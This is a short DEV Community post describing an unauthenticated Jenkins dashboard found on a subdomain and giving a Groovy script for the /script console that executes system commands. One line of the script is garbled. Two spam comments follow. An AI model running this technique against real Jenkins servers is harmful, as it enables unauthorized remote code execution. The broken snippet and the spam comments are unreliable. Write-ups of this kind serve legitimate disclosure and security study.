DEV Community

Cover image for Remote Code Execution on subdomain
Khaled Nassar
Khaled Nassar

Posted on

Remote Code Execution on subdomain

i've found Jenkins on does not require authentication for access dashboard

what can i do with this .?

everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${}"
Enter fullscreen mode Exit fullscreen mode


Top comments (2)

donnalnman profile image

Remote code execution is a cyber-attack in which an attacker can execute commands remotely on another person's computing device. RCEs are usually caused by malicious malware downloaded by the host Spells to make him love you forever

freyapachl1 profile image

Remote code execution is usually accomplished by spawning a remote command shell that allows the attacker to execute operating system commands on the target system. Make someone miss you spell